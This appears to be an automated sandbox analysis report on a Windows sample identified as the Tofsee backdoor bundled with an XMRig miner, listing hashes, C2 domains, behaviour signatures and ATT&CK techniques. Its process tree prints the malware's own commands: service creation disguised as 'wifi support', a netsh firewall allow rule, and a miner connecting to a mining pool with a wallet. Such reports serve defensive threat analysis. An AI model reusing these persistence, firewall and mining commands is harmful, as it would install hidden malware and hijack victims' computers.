Overview

overview

10

Static

static

dridex

windows10-2004_x64

10

Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220112
  • submitted
    23-01-2022 09:47

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    fe5e449f4a7f459cfd24a3434aeda3b4ff6794f654186ac9f0dc63cf5bf49462.exe

  • Size

    268KB

  • MD5

    80d02fdb640a9dd6d5baee4362fc5232

  • SHA1

    60a43d7260110c48cd256d8e23e5beb55cbb10b6

  • SHA256

    fe5e449f4a7f459cfd24a3434aeda3b4ff6794f654186ac9f0dc63cf5bf49462

  • SHA512

    55d5ca89f7e559b1ce0357c0f15916c91fc29122da154cd2ccd489256779b053d7569b1ef2181501d5f98622461bfddfa7634d1eff71e860cc61f4acf8b17f55

Score
10/10
tofseexmrigevasionminerpersistencetrojan

Malware Config

Extracted

Family

tofsee

C2

patmushta.info

ovicrush.cn

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

    trojantofsee
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner Payload 2 IoCs
    miner
  • Creates new service(s) 1 TTPs
    persistence
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs
    evasion
  • Sets service image path in registry 2 TTPs
    persistence
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Modifies data under HKEY_USERS 51 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\fe5e449f4a7f459cfd24a3434aeda3b4ff6794f654186ac9f0dc63cf5bf49462.exe
    "C:\Users\Admin\AppData\Local\Temp\fe5e449f4a7f459cfd24a3434aeda3b4ff6794f654186ac9f0dc63cf5bf49462.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3448
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\mukpoygc\
      2⤵
        PID:3916
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\ulhagdhn.exe" C:\Windows\SysWOW64\mukpoygc\
        2⤵
          PID:204
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create mukpoygc binPath= "C:\Windows\SysWOW64\mukpoygc\ulhagdhn.exe /d\"C:\Users\Admin\AppData\Local\Temp\fe5e449f4a7f459cfd24a3434aeda3b4ff6794f654186ac9f0dc63cf5bf49462.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
            PID:4040
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" description mukpoygc "wifi internet conection"
            2⤵
              PID:1424
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" start mukpoygc
              2⤵
                PID:3276
              • C:\Windows\SysWOW64\netsh.exe
                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                2⤵
                  PID:2112
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3448 -s 1252
                  2⤵
                  • Program crash
                  PID:1796
              • C:\Windows\SysWOW64\mukpoygc\ulhagdhn.exe
                C:\Windows\SysWOW64\mukpoygc\ulhagdhn.exe /d"C:\Users\Admin\AppData\Local\Temp\fe5e449f4a7f459cfd24a3434aeda3b4ff6794f654186ac9f0dc63cf5bf49462.exe"
                1⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:3472
                • C:\Windows\SysWOW64\svchost.exe
                  svchost.exe
                  2⤵
                  • Drops file in System32 directory
                  • Suspicious use of SetThreadContext
                  • Modifies data under HKEY_USERS
                  • Suspicious use of WriteProcessMemory
                  PID:3620
                  • C:\Windows\SysWOW64\svchost.exe
                    svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                    3⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3232
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3472 -s 536
                  2⤵
                  • Program crash
                  PID:2864
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3448 -ip 3448
                1⤵
                  PID:2208
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 3472 -ip 3472
                  1⤵
                    PID:3716
                  • C:\Windows\System32\WaaSMedicAgent.exe
                    C:\Windows\System32\WaaSMedicAgent.exe 40f7d544a382e9b83ce9b47054a5a5a1 u3pCchQsYkujnCz7FYwSeA.0.1.0.0.0
                    1⤵
                    • Modifies data under HKEY_USERS
                    PID:640
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p
                    1⤵
                      PID:1956
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k wusvcs -p
                      1⤵
                        PID:452

                      Network

                      MITRE ATT&CK Matrix ATT&CK v6

                      Initial Access

                      Execution

                      Persistence

                      New Service

                      1
                      T1050

                      Modify Existing Service

                      1
                      T1031

                      Registry Run Keys / Startup Folder

                      1
                      T1060

                      Privilege Escalation

                      New Service

                      1
                      T1050

                      Defense Evasion

                      Modify Registry

                      1
                      T1112

                      Credential Access

                      Discovery

                      Query Registry

                      1
                      T1012

                      System Information Discovery

                      2
                      T1082

                      Lateral Movement

                      Collection

                      Exfiltration

                      Command and Control

                      Impact

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\Users\Admin\AppData\Local\Temp\ulhagdhn.exe
                        MD5

                        190989b6147aab8b596b5f9d20ee9e5b

                        SHA1

                        3cd6a6287f61793f407a5b854ae712f690a58d5d

                        SHA256

                        18eb682a0e8243124cb4be8f9636bd046f048473be1b9ceb4959aa78b5de14ae

                        SHA512

                        99f87a3d0fea8f4a25b2715bb90dc8d69cedbaba92c6ca6fa67c828d923e5c4f5037cffe850cde36ed0e8672cec7f76285ef6d129f8360929dbd3ff95a9cc52c

                        Download Submit
                      • C:\Windows\SysWOW64\mukpoygc\ulhagdhn.exe
                        MD5

                        190989b6147aab8b596b5f9d20ee9e5b

                        SHA1

                        3cd6a6287f61793f407a5b854ae712f690a58d5d

                        SHA256

                        18eb682a0e8243124cb4be8f9636bd046f048473be1b9ceb4959aa78b5de14ae

                        SHA512

                        99f87a3d0fea8f4a25b2715bb90dc8d69cedbaba92c6ca6fa67c828d923e5c4f5037cffe850cde36ed0e8672cec7f76285ef6d129f8360929dbd3ff95a9cc52c

                        Download Submit
                      • memory/3232-157-0x0000000000700000-0x00000000007F1000-memory.dmp
                        Filesize

                        964KB

                        Download
                      • memory/3232-153-0x0000000000700000-0x00000000007F1000-memory.dmp
                        Filesize

                        964KB

                        Download
                      • memory/3448-130-0x00000000004B0000-0x00000000004BD000-memory.dmp
                        Filesize

                        52KB

                        Download
                      • memory/3448-131-0x00000000004C0000-0x00000000004D3000-memory.dmp
                        Filesize

                        76KB

                        Download
                      • memory/3448-132-0x0000000000400000-0x000000000044A000-memory.dmp
                        Filesize

                        296KB

                        Download
                      • memory/3472-140-0x0000000000400000-0x000000000044A000-memory.dmp
                        Filesize

                        296KB

                        Download
                      • memory/3472-139-0x00000000005C0000-0x00000000005D3000-memory.dmp
                        Filesize

                        76KB

                        Download
                      • memory/3472-138-0x00000000004B0000-0x00000000004BD000-memory.dmp
                        Filesize

                        52KB

                        Download
                      • memory/3620-141-0x0000000004800000-0x0000000004A0F000-memory.dmp
                        Filesize

                        2.1MB

                        Download
                      • memory/3620-143-0x0000000003910000-0x0000000003916000-memory.dmp
                        Filesize

                        24KB

                        Download
                      • memory/3620-145-0x0000000003920000-0x0000000003930000-memory.dmp
                        Filesize

                        64KB

                        Download
                      • memory/3620-147-0x00000000039F0000-0x00000000039F5000-memory.dmp
                        Filesize

                        20KB

                        Download
                      • memory/3620-149-0x0000000009740000-0x0000000009B4B000-memory.dmp
                        Filesize

                        4.0MB

                        Download
                      • memory/3620-151-0x0000000004CF0000-0x0000000004CF7000-memory.dmp
                        Filesize

                        28KB

                        Download
                      • memory/3620-135-0x0000000000380000-0x0000000000395000-memory.dmp
                        Filesize

                        84KB

                        Download